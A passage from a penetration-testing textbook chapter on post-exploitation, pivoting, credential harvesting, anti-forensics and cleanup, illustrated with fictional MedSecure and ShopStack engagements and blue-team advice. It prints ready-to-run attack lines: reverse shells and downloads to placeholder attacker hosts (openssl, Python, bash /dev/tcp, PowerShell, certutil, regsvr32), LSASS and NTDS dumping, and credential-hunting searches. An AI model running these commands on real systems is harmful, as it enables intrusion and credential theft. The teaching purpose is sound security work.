- SSH keys: Harvested private keys stored on compromised systems
- Shared credentials: Reused passwords across systems (especially service accounts)
- NFS shares: Misconfigured exports with root squash disabled
- Ansible/Salt/Puppet: Configuration management tools that provide administrative access to managed hosts
- Container escape: Breaking out of Docker or Kubernetes containers to access the underlying host or other containers
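The first item -- harvesting SSH private keys -- is straightforward to automate, because private keys announce themselves with a recognizable PEM-style header. A sketch that scans a directory tree, demonstrated here against a throwaway directory containing a fake key:

```python
import os
import tempfile

# First-line markers of common private-key formats
KEY_MARKERS = (b"-----BEGIN OPENSSH PRIVATE KEY-----",
               b"-----BEGIN RSA PRIVATE KEY-----",
               b"-----BEGIN EC PRIVATE KEY-----")

def find_private_keys(root: str):
    """Walk a directory tree and return files whose first line looks
    like a PEM/OpenSSH private-key header."""
    found = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                with open(path, "rb") as fh:
                    first = fh.readline().strip()
            except OSError:
                continue  # unreadable files are skipped
            if first in KEY_MARKERS:
                found.append(path)
    return found

# Demo against a temporary directory with a fake (non-functional) key
demo = tempfile.mkdtemp()
with open(os.path.join(demo, "id_ed25519"), "wb") as fh:
    fh.write(b"-----BEGIN OPENSSH PRIVATE KEY-----\n(not a real key)\n")
print(find_private_keys(demo))
```

In an engagement, the same scan over `/home` and `/root` (with appropriate privileges) frequently turns up unprotected keys that enable immediate lateral movement.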
24.5.5 Lateral Movement in Cloud Environments
Cloud environments introduce new lateral movement paradigms:
- IAM role assumption: Assuming other IAM roles with broader permissions
- Metadata service exploitation: Accessing instance metadata to obtain temporary credentials (IMDS)
- Cross-account access: Leveraging trust relationships between cloud accounts
- Service principal abuse: Using compromised service principals to access other cloud resources
- Shared storage: Accessing cloud storage buckets, file shares, or databases with harvested credentials
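To make the metadata-service vector concrete, the AWS IMDSv2 flow is a two-step exchange: a PUT request obtains a short-lived session token, then GETs present that token in a header. The sketch below only constructs the requests without sending them -- 169.254.169.254 is a link-local address reachable only from inside an instance:

```python
from urllib import request

IMDS = "http://169.254.169.254"  # link-local metadata address (AWS)

def build_imdsv2_requests(path="latest/meta-data/iam/security-credentials/"):
    """Construct (without sending) the two-step IMDSv2 exchange:
    a PUT obtains a session token, then a GET presents it."""
    token_req = request.Request(
        f"{IMDS}/latest/api/token", method="PUT",
        headers={"X-aws-ec2-metadata-token-ttl-seconds": "21600"})
    data_req = request.Request(
        f"{IMDS}/{path}", method="GET",
        headers={"X-aws-ec2-metadata-token": "<token from first response>"})
    return token_req, data_req

tok, data = build_imdsv2_requests()
print(tok.get_method(), data.full_url)
```

The token requirement is exactly why IMDSv2 matters defensively: a simple SSRF vulnerability can issue GETs but usually cannot issue the initial PUT, which blocks the classic credential-theft path that worked against IMDSv1.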
In the SolarWinds attack, APT29 famously pivoted from on-premises Active Directory to Azure AD by forging SAML tokens, demonstrating how lateral movement increasingly spans the boundary between traditional and cloud infrastructure.
Blue Team Perspective: Defend against lateral movement with defense-in-depth: implement network segmentation with microsegmentation where possible, deploy EDR on all endpoints, enable and monitor Windows event logs (especially Event IDs 4624, 4625, 4648, 4672, 4768, 4769, 4776), implement Local Administrator Password Solution (LAPS) to prevent password reuse, disable legacy protocols (NTLM where possible), and adopt a Zero Trust architecture that verifies every access request regardless of network location.
24.6 Advanced Post-Exploitation Techniques
Beyond the fundamental techniques covered above, several advanced post-exploitation methods deserve attention for their effectiveness in modern environments.
24.6.1 Living Off the Land (LOL)
Living off the Land Binaries (LOLBins) are legitimate system binaries that can be repurposed for malicious activities. Because these binaries are signed by the operating system vendor and expected to be present on every system, they bypass many security controls including application whitelisting.
Common LOLBins for post-exploitation include:
Windows LOLBins:
- certutil.exe: Download files, encode/decode data, manage certificates
- mshta.exe: Execute HTA files containing scripts
- rundll32.exe: Execute DLL exports, including JavaScript
- regsvr32.exe: Execute scriptlets from remote URLs
- bitsadmin.exe: Download files using the Background Intelligent Transfer Service
- wmic.exe: Execute commands, gather system information, create processes
- msiexec.exe: Install MSI packages from remote locations
- powershell.exe: Execute scripts, download files, interact with .NET
# Download a file using certutil (LOLBin)
certutil -urlcache -split -f http://attacker/tool.exe C:\Users\Public\tool.exe
# Download using bitsadmin
bitsadmin /transfer job /download /priority high http://attacker/tool.exe C:\Users\Public\tool.exe
# Execute a remote scriptlet via regsvr32
regsvr32 /s /n /u /i:http://attacker/payload.sct scrobj.dll
Linux LOLBins:
- curl / wget: Download files and exfiltrate data
- python / python3: Execute scripts, create reverse shells, encode data
- perl / ruby: Alternative scripting for reverse shells and data processing
- socat: Create reverse shells, port forwarding, file transfer
- openssl: Encrypted file transfer, reverse shells with encryption
- ncat / nc: Network connections, reverse shells, file transfer
# Encrypted reverse shell using openssl (LOLBin)
# On attacker: openssl s_server -quiet -key key.pem -cert cert.pem -port 443
mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect ATTACKER:443 > /tmp/s; rm /tmp/s
# Python reverse shell
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ATTACKER",443));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'
# File download with curl piped to bash (dangerous, for authorized testing only)
curl http://attacker/script.sh | bash
The LOLBAS project (lolbas-project.github.io) for Windows and GTFOBins (gtfobins.github.io) for Linux maintain comprehensive databases of these binaries and their offensive capabilities.
Blue Team Perspective: Detecting LOLBin abuse requires behavioral monitoring rather than signature-based detection. EDR solutions should alert on unusual process lineage (e.g., certutil.exe downloading files, wmic.exe spawning child processes), unusual command-line arguments for common binaries, and network connections from binaries that should not communicate externally. Implementing application control policies that restrict how LOLBins can be used (without blocking their legitimate functions) provides strong defense.
24.6.2 Memory-Only Malware and Fileless Techniques
Sophisticated attackers increasingly operate entirely in memory, leaving minimal artifacts on disk that could be detected by traditional antivirus or forensic analysis.
Fileless techniques include:
- PowerShell in memory: Loading and executing .NET assemblies directly in memory without writing to disk
- Reflective DLL injection: Loading DLLs directly from memory into a process without using the standard Windows loader
- Process hollowing: Creating a legitimate process in a suspended state, replacing its code in memory with malicious code, then resuming execution
- Thread injection: Injecting code into the memory space of a running legitimate process
# Load a .NET assembly directly into memory (fileless execution)
$assembly = [System.Reflection.Assembly]::Load(
(New-Object System.Net.WebClient).DownloadData(
"http://attacker/payload.dll"
)
)
# Execute in-memory using Invoke-Expression
IEX (New-Object Net.WebClient).DownloadString("http://attacker/script.ps1")
# AMSI bypass attempt (for authorized testing against your own systems)
# Note: This is frequently updated; specific bypasses change rapidly
Modern EDR solutions detect many fileless techniques through:
- AMSI (Antimalware Scan Interface) integration with PowerShell and scripting engines
- ETW (Event Tracing for Windows) monitoring for process injection
- Memory scanning for known implant signatures
- Behavioral analysis of process trees and system calls
24.6.3 Token Manipulation and Impersonation
Windows access tokens control what privileges and access rights a process has. Manipulating tokens is a powerful post-exploitation technique:
Token Impersonation: If a process can access another user's token (typically requiring SeImpersonatePrivilege), it can impersonate that user. Services like IIS and SQL Server commonly have this privilege, making compromised service accounts valuable targets.
Token Theft: Using tools like Mimikatz or Cobalt Strike's steal_token command, an attacker can list all tokens available on a system and impersonate any logged-in user.
Potato Attacks: A family of privilege escalation techniques (Hot Potato, Juicy Potato, Sweet Potato, Rogue Potato, PrintSpoofer, GodPotato) that abuse Windows token impersonation from service accounts to achieve SYSTEM-level access.
# Using Mimikatz for token manipulation
# List available tokens
token::list
# Impersonate a specific user's token
token::elevate /domainadmin
# Revert to original token
token::revert
24.6.4 Post-Exploitation Automation with BloodHound
BloodHound is an essential tool for understanding and navigating Active Directory environments during post-exploitation. It ingests Active Directory data and uses graph theory to identify the shortest path from the current position to domain administration.
BloodHound reveals:
- Attack paths: The shortest path from any compromised user to domain admin
- Kerberoastable accounts: Service accounts vulnerable to offline password cracking
- AS-REP Roastable accounts: Accounts without pre-authentication that can be attacked offline
- Delegation configurations: Unconstrained and constrained delegation that can be abused
- Group membership chains: Nested group memberships that provide unexpected privileges
- ACL-based attack paths: Discretionary access control entries that allow password resets, group additions, or object modification
# Collect Active Directory data with SharpHound
# (the BloodHound data collector)
.\SharpHound.exe -c all
# Or use the Python collector (bloodhound-python)
bloodhound-python -u user -p password -d domain.local -ns DC_IP -c all
The data collected by SharpHound is imported into BloodHound's Neo4j graph database, where it can be queried to find attack paths. The visual representation of these paths is invaluable for both penetration test reports and defensive remediation planning.
Blue Team Perspective: Run BloodHound regularly against your own Active Directory to identify and remediate attack paths before attackers find them. Focus remediation on "chokepoint" objects that appear in multiple attack paths. Monitor for SharpHound data collection activity (large LDAP queries, excessive DNS lookups).
24.7 The MedSecure Post-Exploitation Scenario
Let us walk through MedSecure's penetration test to illustrate how post-exploitation and pivoting combine in a realistic engagement.
Phase 1: Initial Access
The tester exploits a Java deserialization vulnerability in MedSecure's patient portal (10.10.10.50), obtaining a reverse shell as the tomcat user.
Phase 2: Situational Awareness
# The tester discovers dual network interfaces
ip addr show
# eth0: 10.10.10.50/24 (DMZ)
# eth1: 172.16.5.50/24 (Internal Management)
# The tester identifies interesting internal hosts
# by examining the application's database configuration
cat /opt/tomcat/webapps/portal/WEB-INF/database.properties
# db.host=172.16.5.200
# db.user=portal_svc
# db.password=M3dS3cur3!DB
Phase 3: Privilege Escalation
The tester discovers a cron job running as root that executes a script from a writable directory:
# Writable backup script executed by root cron
ls -la /opt/scripts/backup.sh
# -rwxrwxrwx 1 root root 1204 Jan 15 08:00 /opt/scripts/backup.sh
# Inject a reverse shell into the backup script
echo 'bash -i >& /dev/tcp/ATTACKER_IP/443 0>&1' >> /opt/scripts/backup.sh
Phase 4: Pivoting
With root access, the tester sets up a pivot to reach the internal network:
# Upload Chisel to the compromised host
# On attacker machine: ./chisel server --reverse --port 8443 --socks5
# On target:
./chisel client ATTACKER_IP:8443 R:socks
# The tester can now scan the internal network
proxychains nmap -sT -Pn -p 22,80,443,445,1433,3306,3389 172.16.5.0/24
Phase 5: Lateral Movement
Using the database credentials discovered in Phase 2, the tester accesses the internal database server and discovers additional credentials:
# Connect to the internal database through the pivot
proxychains mysql -h 172.16.5.200 -u portal_svc -p'M3dS3cur3!DB'
# Discover additional service account credentials in the database
# These credentials provide access to the Active Directory domain
Phase 6: Objective Achievement
The tester demonstrates access to synthetic patient record data, documenting the complete attack chain from external web application vulnerability to internal database access. The report highlights that network segmentation between the DMZ and internal network was ineffective because the web server maintained persistent database connectivity without adequate access controls.
24.8 Cleaning Up Responsibly
The cleanup phase is a critical professional obligation. Every artifact introduced during testing must be removed, and every change must be reversed. Failure to clean up properly can leave the client's environment less secure than before the test.
24.8.1 Cleanup Checklist
A thorough cleanup process addresses:
- Persistence mechanisms: Remove all backdoors, scheduled tasks, registry entries, SSH keys, services, and implants
- Tools and binaries: Delete all uploaded tools (Chisel, Ligolo, LinPEAS, etc.)
- Staged data: Securely delete any staged or exfiltrated data
- Log artifacts: While testers should not delete security logs (this would itself be suspicious and potentially violate the engagement agreement), they should document which log entries relate to testing activities
- Configuration changes: Revert any modified configurations (firewall rules, service accounts, group memberships)
- Credential changes: If any passwords were changed during testing, coordinate with the client to reset them
- Network changes: Remove any port forwards, routes, or tunnel configurations
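A checklist like this lends itself to a scripted verification pass run after manual cleanup. A minimal sketch -- the artifact paths and the 'ATTACKER_IP' cron marker are hypothetical examples; substitute the entries from your own engagement log:

```shell
#!/bin/sh
# Post-engagement cleanup verification (example artifact paths; replace
# with the items recorded in the engagement cleanup log).
LEFTOVERS=0
for artifact in /tmp/chisel /tmp/.staging /opt/.update; do
    if [ -e "$artifact" ]; then
        echo "LEFTOVER: $artifact"
        LEFTOVERS=$((LEFTOVERS + 1))
    fi
done
# Look for testing-related cron entries (guarded: crontab may be absent)
if crontab -l 2>/dev/null | grep -qi 'ATTACKER_IP'; then
    echo "LEFTOVER: cron entry"
    LEFTOVERS=$((LEFTOVERS + 1))
fi
echo "cleanup check complete: $LEFTOVERS leftover artifact(s)"
```

Running the same script on every compromised host, then attaching its output to the cleanup log, gives the client verifiable evidence that the environment was restored.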
24.8.2 Documentation for Cleanup
Professional testers maintain a real-time log of all changes made to the environment:
## Engagement Cleanup Log
### Host: 10.10.10.50 (Patient Portal)
- [x] Removed SSH key from /root/.ssh/authorized_keys
- [x] Removed cron persistence entry
- [x] Deleted /tmp/chisel binary
- [x] Deleted /tmp/.staging/ directory and contents
- [x] Removed injected line from /opt/scripts/backup.sh
- [x] Deleted /opt/.update/ directory
### Host: 172.16.5.200 (Database Server)
- [x] No persistent changes made
- [x] Client notified about portal_svc credential exposure
24.8.3 Client Communication
The tester communicates with the client's security team throughout the cleanup process:
- Provide a complete list of all modifications made
- Coordinate timing for cleanup to minimize disruption
- Verify cleanup completion with the client's team
- Offer to assist with any remediation of discovered issues
- Provide the client with IOCs (Indicators of Compromise) related to the testing activity so they can verify their detection capabilities
24.9 Post-Exploitation Reporting: Telling the Attack Story
The ultimate purpose of post-exploitation is to produce a compelling report that communicates risk to stakeholders. The difference between a mediocre penetration test report and an excellent one often lies in how the post-exploitation narrative is constructed.
24.9.1 The Attack Narrative Structure
A well-structured post-exploitation narrative follows the attack chain from initial access to objective achievement, making the risk tangible for both technical and non-technical audiences:
- Initial Vulnerability: What was the entry point? (e.g., "A Java deserialization vulnerability in the patient portal allowed remote code execution as the tomcat service account")
- Escalation Path: How did access expand? Include each privilege escalation and pivot with specific evidence
- Lateral Movement: How did the attacker reach critical systems? Document each hop with timestamps and methods
- Impact Demonstration: What was ultimately accessed? Document evidence without exposing actual sensitive data
- Business Risk Translation: Convert technical findings into business language ("An attacker with the skills demonstrated could access approximately 2.3 million patient records, triggering mandatory HIPAA breach notification requirements and potential regulatory fines")
24.9.2 Evidence Collection During Post-Exploitation
Throughout post-exploitation, collect evidence that supports the narrative:
- Screenshots: Capture directory listings, system prompts, tool output, and network diagrams. Never screenshot actual sensitive data.
- Command logs: Maintain a complete log of every command executed on every compromised host, with timestamps.
- Network diagrams: Create diagrams showing the attack path through the network, including all pivot points and lateral movement hops.
- Credential evidence: Document where credentials were found and how they were used, without including the actual credential values in screenshots that might be shared widely.
- Timeline: Construct a detailed timeline of the engagement from initial access through cleanup.
24.9.3 Risk Rating Post-Exploitation Findings
Post-exploitation findings should be rated based on the combined risk of the attack chain, not just individual vulnerabilities:
- A "Medium" SQL injection that enables access to a database containing hardcoded domain admin credentials becomes a "Critical" finding when the full chain is documented
- A "Low" information disclosure vulnerability that reveals internal network architecture becomes "High" when combined with a pivot path to critical systems
- Network segmentation failures that are invisible to vulnerability scanners become obvious through post-exploitation testing
This chain-based risk assessment is one of the primary values that penetration testing provides over automated vulnerability scanning.
24.10 Post-Exploitation in the ShopStack and Student Lab Environments
ShopStack E-Commerce Platform
In the ShopStack scenario, post-exploitation focuses on the e-commerce application's payment processing infrastructure. After compromising the application server, testers pivot to the payment processing segment to determine whether cardholder data environment (CDE) segmentation is effective. Key objectives include testing PCI DSS segmentation controls and demonstrating whether an attacker could reach payment card data from a compromised web frontend.
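A quick segmentation check from a compromised frontend does not require uploading tools at all: bash's /dev/tcp pseudo-device can probe reachability of CDE hosts with shell built-ins alone. A sketch, demonstrated here against a localhost port (the probe function is a hypothetical helper; in the ShopStack test its arguments would be CDE addresses and payment-service ports):

```shell
#!/bin/bash
# Probe a host:port using only bash built-ins (/dev/tcp) plus timeout --
# useful on hardened hosts where nc and nmap are unavailable.
probe() {
    if timeout 2 bash -c "exec 3<>/dev/tcp/$1/$2" 2>/dev/null; then
        echo "$1:$2 open"
    else
        echo "$1:$2 closed/filtered"
    fi
}
# Port 1 on loopback is almost certainly closed -- the result a tester
# hopes to see when probing the CDE from the web tier
probe 127.0.0.1 1
```

A "closed/filtered" result for every CDE host and port is the evidence that segmentation controls are holding; any "open" result becomes a PCI DSS segmentation finding.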
Student Home Lab
For the home lab, students can practice post-exploitation and pivoting using a multi-VM environment:
- Kali Linux (attacker): 192.168.1.100
- Metasploitable 2 (initial target): 192.168.1.200, also connected to 10.0.0.0/24
- Internal Ubuntu (pivot target): 10.0.0.50
Students exploit Metasploitable 2, establish a pivot through it, and access the internal Ubuntu VM. This simple three-machine setup teaches the fundamental concepts of pivoting without requiring expensive infrastructure.
# Student lab: Basic SSH pivot exercise
# 1. Exploit Metasploitable 2 and obtain SSH credentials
# 2. Create a SOCKS proxy through Metasploitable
ssh -D 1080 user@192.168.1.200
# 3. Scan the internal network through the pivot
proxychains nmap -sT -Pn 10.0.0.0/24
# 4. Access the internal Ubuntu VM
proxychains ssh user@10.0.0.50
24.11 Anti-Forensics and Operational Security
While ethical hackers must document their activities transparently, understanding anti-forensics techniques is essential for two reasons: first, to simulate sophisticated adversaries who employ these techniques, and second, to help blue teams understand what indicators to look for when investigating real breaches.
24.11.1 Timestomping
Timestomping is the modification of file timestamps (creation, modification, access, and metadata-change times) to make malicious files appear as if they have been present on the system longer than they actually have. On Windows, tools like Timestomp (part of Meterpreter) and PowerShell can modify all four NTFS timestamps. On Linux, the touch command can modify modification and access times (but not the inode change time).
Defenders can detect timestomping by comparing NTFS $STANDARD_INFORMATION timestamps with $FILE_NAME timestamps in the Master File Table (MFT), as the latter are harder to modify. Inconsistencies between these two sets of timestamps indicate tampering.
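On Linux the technique is a single command. A lab sketch (GNU touch and stat assumed) that backdates a file and confirms the forged modification time:

```shell
# Timestomping on Linux (authorized lab use only): backdate a file's
# modification time, then verify the forged value with stat.
f=$(mktemp)
touch -d '2020-01-01 12:00:00 UTC' "$f"   # forge mtime (GNU touch -d)
stat -c '%Y' "$f"                         # -> 1577880000 (epoch seconds)
rm -f "$f"
```

Note that touch cannot alter the inode change time (ctime), which is the Linux analogue of the NTFS timestamp comparison: a ctime newer than a suspiciously old mtime is itself an indicator of tampering.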
24.11.2 Log Manipulation
Sophisticated attackers may attempt to cover their tracks by manipulating system logs:
- Selective deletion: Removing specific log entries related to the attack while leaving the rest intact (more subtle than clearing entire logs)
- Log flooding: Generating large volumes of benign log entries to make forensic analysis more difficult
- Timestamp manipulation: Modifying log timestamps to confuse incident timeline reconstruction
- Log forwarding disruption: Disabling or redirecting syslog forwarding to prevent centralized log collection
Important: During authorized penetration tests, testers should NEVER delete, modify, or tamper with security logs. This would violate the engagement agreement, potentially break laws regarding evidence tampering, and deprive the client of valuable data about detection capabilities. Instead, testers should document what log entries their activities generated so the client can evaluate their monitoring effectiveness.
24.11.3 Indicator of Compromise (IOC) Awareness
Professional penetration testers should be aware of the IOCs their activities generate and document them for the client:
- Network IOCs: Unusual connections, beaconing patterns, large data transfers, DNS queries to unusual domains
- Host IOCs: New files, modified registry keys, new scheduled tasks, unusual processes, new user accounts
- Authentication IOCs: Failed login attempts, successful logins at unusual times, privilege escalation events, Kerberos ticket anomalies
- Log IOCs: Specific Windows Event IDs (4624, 4625, 4672, 4688, 4768, 4769, 7045, etc.) and syslog entries
Providing the client with a list of IOCs generated during testing enables them to evaluate their detection capabilities: which IOCs were detected and alerted on, which were logged but not alerted on, and which were missed entirely. This gap analysis is often the most valuable part of the post-exploitation report.
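On Linux hosts, many of the authentication IOCs above reduce to grep patterns over the auth log. A sketch against synthetic sshd lines (the hostnames, PIDs, and addresses are fabricated sample data):

```shell
# Match authentication IOCs in an auth log (synthetic sample lines).
LOG=$(mktemp)
cat > "$LOG" <<'EOF'
Jan 15 08:01:02 web01 sshd[1234]: Failed password for invalid user admin from 10.10.10.99 port 51515 ssh2
Jan 15 08:01:05 web01 sshd[1236]: Failed password for root from 10.10.10.99 port 51517 ssh2
Jan 15 08:01:10 web01 sshd[1240]: Accepted publickey for deploy from 10.10.10.99 port 51520 ssh2
EOF
grep -c 'Failed password' "$LOG"            # -> 2 (failed login attempts)
grep 'Accepted' "$LOG" | awk '{print $11}'  # -> 10.10.10.99 (source of success)
```

The same two patterns -- a burst of failures followed by a success from the identical source address -- are exactly what the tester should hand the client as an IOC to hunt for.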
24.12 Credential Harvesting Deep Dive
Credential harvesting is the engine that drives post-exploitation. Without credentials, lateral movement stalls. Understanding the full landscape of credential storage locations and extraction techniques is essential for effective post-exploitation.
24.12.1 Windows Credential Storage
Windows stores credentials in multiple locations, each requiring different techniques for extraction:
SAM Database: The Security Account Manager database (C:\Windows\System32\config\SAM) stores local account password hashes. It is locked while Windows is running, but hashes can be extracted from memory or by booting from alternative media.
# Extract SAM hashes with Impacket's secretsdump
python3 secretsdump.py ./Administrator:Password@TARGET_IP
# Extract SAM hashes with CrackMapExec
crackmapexec smb TARGET_IP -u Administrator -p Password --sam
# Extract from memory with Mimikatz
sekurlsa::logonpasswords
LSASS Process Memory: The Local Security Authority Subsystem Service (lsass.exe) process holds credentials for recently authenticated users in memory. This includes NTLM hashes, Kerberos tickets, and in some configurations, plaintext passwords.
# Dump LSASS with procdump (Sysinternals - signed binary)
procdump.exe -ma lsass.exe lsass.dmp
# Dump LSASS with comsvcs.dll (LOLBin technique)
rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump [LSASS_PID] C:\temp\lsass.dmp full
# Parse the dump offline with Mimikatz
sekurlsa::minidump lsass.dmp
sekurlsa::logonpasswords
Windows Credential Manager: Stores web credentials, Windows credentials, and certificate-based credentials. Can be accessed through the Credential Manager GUI or programmatically.
DPAPI (Data Protection API): Windows uses DPAPI to protect various credentials, including Chrome browser passwords, Windows Vault credentials, and RDP connection credentials. DPAPI-encrypted blobs can be decrypted with the user's master key, which is derived from their password.
Group Policy Preferences (GPP): Legacy Group Policy Preferences stored in SYSVOL may contain AES-encrypted passwords. The encryption key was published by Microsoft, making decryption trivial.
# Find and decrypt GPP passwords
python3 gpp-decrypt.py "ENCRYPTED_PASSWORD_STRING"
# CrackMapExec module for GPP
crackmapexec smb DC_IP -u user -p password -M gpp_password
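The reason decryption is trivial is that the AES-256 key is a fixed, publicly documented constant. A sketch round-tripping a sample value with the openssl CLI to show the mechanism (the real cpassword format additionally uses UTF-16LE encoding and base64 padding quirks, glossed over here; the sample password is fabricated):

```shell
# The static AES-256 key Microsoft published for GPP cpassword values:
KEY=4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b
IV=00000000000000000000000000000000
# Round trip: anyone with SYSVOL read access can perform the second step.
ENC=$(printf 'Sup3rS3cret!' | openssl enc -aes-256-cbc -K "$KEY" -iv "$IV" -base64)
echo "$ENC" | openssl enc -d -aes-256-cbc -K "$KEY" -iv "$IV" -base64
# -> Sup3rS3cret!
```

Because every domain user can read SYSVOL, a single leftover Groups.xml with a cpassword attribute is effectively a plaintext credential.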
NTDS.dit: The Active Directory database stored on Domain Controllers contains password hashes for all domain accounts. Extraction requires Domain Admin or equivalent privileges.
# Extract NTDS.dit with secretsdump (DCSync attack)
python3 secretsdump.py domain/admin:password@DC_IP -just-dc-ntlm
# Or using the Volume Shadow Copy method
vssadmin create shadow /for=C:
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\ntds.dit C:\temp\ntds.dit
24.12.2 Linux Credential Storage
Linux credential storage is more straightforward but equally rich:
Shadow File: /etc/shadow contains password hashes for local accounts. Requires root access to read.
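Each shadow entry is nine colon-separated fields, with the hash algorithm encoded in the $id$ prefix of field two. A sketch parsing a synthetic entry (the account name and hash are fabricated):

```shell
# Parse a synthetic /etc/shadow entry. Field 1 = account, field 2 = hash;
# the $id$ prefix identifies the algorithm (1=MD5, 5=SHA-256, 6=SHA-512,
# y=yescrypt) -- which tells you what cracking mode to use offline.
ENTRY='svc_backup:$6$rounds=5000$abcdefgh$FAKEHASH:19600:0:99999:7:::'
ACCT=$(printf '%s' "$ENTRY" | cut -d: -f1)
ALG=$(printf '%s' "$ENTRY" | cut -d: -f2 | cut -d'$' -f2)
echo "$ACCT uses algorithm id $ALG"   # -> svc_backup uses algorithm id 6
```

Identifying the algorithm id up front matters because it maps directly to the hashcat or John the Ripper mode used for offline cracking.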
SSH Keys: Private keys stored in user home directories (~/.ssh/id_rsa, ~/.ssh/id_ed25519) provide passwordless authentication to other systems. Searching all user home directories for SSH keys is a standard post-exploitation task.
Configuration Files: Application configuration files frequently contain credentials in plaintext or base64 encoding:
# Search for potential credentials in common locations
grep -r "password" /etc/ --include="*.conf" --include="*.yml" --include="*.ini" 2>/dev/null
grep -r "password" /opt/ --include="*.properties" --include="*.xml" 2>/dev/null
grep -r "api_key\|api_secret\|token" /var/www/ 2>/dev/null
# Check bash history for credential leakage
cat /home/*/.bash_history 2>/dev/null | grep -i "pass\|key\|token\|secret"
# Check environment variables
env | grep -i "pass\|key\|token\|secret"
Browser Credentials: Firefox stores credentials in logins.json (encrypted with a key in key4.db). Chrome on Linux stores credentials in ~/.config/google-chrome/Default/Login Data (SQLite database, encrypted with the user's keyring).
Keyring and Secret Storage: GNOME Keyring and KDE Wallet store application passwords. These can be accessed if the user's session is compromised.
24.12.3 Cloud Credential Harvesting
Cloud environments introduce new credential targets:
- AWS credentials file: ~/.aws/credentials contains access key IDs and secret access keys
- Azure CLI tokens: the ~/.azure/ directory contains authentication tokens
- GCP credentials: ~/.config/gcloud/credentials.db and application default credentials
- Docker configuration: ~/.docker/config.json may contain registry authentication tokens
- Kubernetes configurations: ~/.kube/config contains cluster authentication details
# Search for cloud credentials
find / -name "credentials" -path "*/.aws/*" 2>/dev/null
find / -name "config.json" -path "*/.docker/*" 2>/dev/null
find / -name "*.kubeconfig" 2>/dev/null
# Check environment variables for cloud credentials
env | grep -i "AWS_\|AZURE_\|GOOGLE_\|GCP_"
Blue Team Perspective: Protect credentials with a layered approach: implement Credential Guard on Windows to protect LSASS memory, deploy LAPS for unique local administrator passwords, use managed identity and service principals instead of stored credentials for cloud access, implement secrets management solutions (HashiCorp Vault, AWS Secrets Manager, Azure Key Vault), regularly scan for hardcoded credentials in code and configuration files, and monitor for credential dumping activities (Event IDs 4624, 4625, 4648 for Windows; audit log entries for sudo, su, and SSH key usage on Linux).
24.13 Ethical and Legal Considerations
Post-exploitation carries the highest risk of any penetration testing phase. The ethical hacker is operating inside a production environment with potentially elevated privileges. Mistakes can cause data loss, service disruption, or exposure of sensitive information.
Key Principles
- Scope adherence: Never access systems or data outside the authorized scope, even if technically possible
- Data handling: Never access, copy, or store real sensitive data (PII, PHI, financial records). Use screenshots of directory listings or record counts to demonstrate access without handling actual data
- System stability: Avoid actions that could crash production systems. Prefer stealthy, low-impact techniques over aggressive exploitation
- Real-time communication: Maintain open communication with the client's point of contact. Report critical findings immediately rather than waiting for the final report
- Legal compliance: Ensure all activities comply with applicable laws and regulations. Post-exploitation activities that exceed the scope of authorization may constitute criminal computer access, regardless of intent
The "Crown Jewels" Dilemma
When a penetration test achieves access to the organization's most sensitive data -- patient records at MedSecure, cardholder data at ShopStack -- the tester faces an ethical decision. The goal is to demonstrate that access is possible, not to actually browse or collect sensitive data. Professional testers:
- Document the path taken to reach the sensitive system
- Record evidence of access (screenshots of database tables showing column headers, record counts) without viewing actual data content
- Immediately notify the client of critical findings
- Include specific remediation recommendations in the report
24.14 The Penetration Test Kill Chain: Post-Exploitation in Context
Understanding where post-exploitation fits within the broader penetration testing methodology helps testers plan their engagements more effectively and communicate findings to stakeholders with appropriate context.
24.14.1 From Exploitation to Post-Exploitation
The transition from exploitation to post-exploitation is not always a clean boundary. When an exploit delivers a shell, the tester must immediately assess the situation before proceeding:
Shell Assessment Checklist:
1. What type of shell do I have? A bind shell, reverse shell, web shell, or interactive session each has different capabilities and limitations
2. What privilege level? Running as root/SYSTEM versus an unprivileged user fundamentally changes the available post-exploitation paths
3. What operating system and version? Determines which tools, techniques, and persistence mechanisms apply
4. Is there network connectivity? Can the compromised host reach other internal networks, or is it isolated?
5. What security controls are present? Antivirus, EDR, application whitelisting, and logging configurations all influence technique selection
24.14.2 Shell Upgrading and Stabilization
Raw reverse shells are fragile and limited. Professional testers stabilize their access before proceeding with post-exploitation:
# Python PTY upgrade (Linux)
python3 -c 'import pty; pty.spawn("/bin/bash")'
# Background the shell and configure terminal
# Press Ctrl-Z
stty raw -echo; fg
# Set terminal environment variables
export TERM=xterm-256color
export SHELL=/bin/bash
stty rows 50 columns 120
On Windows, upgrading from a basic cmd.exe shell to PowerShell (or a Meterpreter/C2 agent) provides significantly more capability. The ConPTY (Console Pseudo Terminal) technique enables full interactive terminal access over reverse shells:
# PowerShell reverse shell upgrade
$client = New-Object System.Net.Sockets.TCPClient("ATTACKER_IP", 4444)
$stream = $client.GetStream()
[byte[]]$bytes = 0..65535|%{0}
$sendbytes = ([text.encoding]::ASCII).GetBytes("PS " + (pwd).Path + "> ")
$stream.Write($sendbytes,0,$sendbytes.Length)
# Read-execute loop: run each received line, return output plus a prompt
while(($i = $stream.Read($bytes,0,$bytes.Length)) -ne 0){
    $out = (Invoke-Expression (([text.encoding]::ASCII).GetString($bytes,0,$i)) 2>&1 | Out-String) + "PS " + (pwd).Path + "> "
    $sb = ([text.encoding]::ASCII).GetBytes($out); $stream.Write($sb,0,$sb.Length)
}
$client.Close()
24.14.3 Common Post-Exploitation Mistakes
Even experienced testers make mistakes during post-exploitation. Understanding common pitfalls helps avoid them:
Running noisy tools too early: Executing a full Nmap scan or BloodHound collector before understanding the environment may trigger alerts and burn the access. Start with passive reconnaissance -- reading files, examining network connections, and understanding the environment -- before running active tools.
Neglecting to check for EDR: Modern Endpoint Detection and Response solutions will detect and block many common post-exploitation tools. Before uploading Mimikatz or running SharpHound, identify what security products are installed and select appropriate evasion techniques.
# Check for common EDR/AV products on Windows
Get-Process | Where-Object {
$_.ProcessName -match "MsMpEng|CrowdStrike|Cortex|Sentinel|Carbon|Cylance|Sophos|Symantec|McAfee"
}
Get-Service | Where-Object {
$_.Name -match "WinDefend|CSFalcon|xagt|SentinelAgent|CbDefense|CylanceSvc"
}
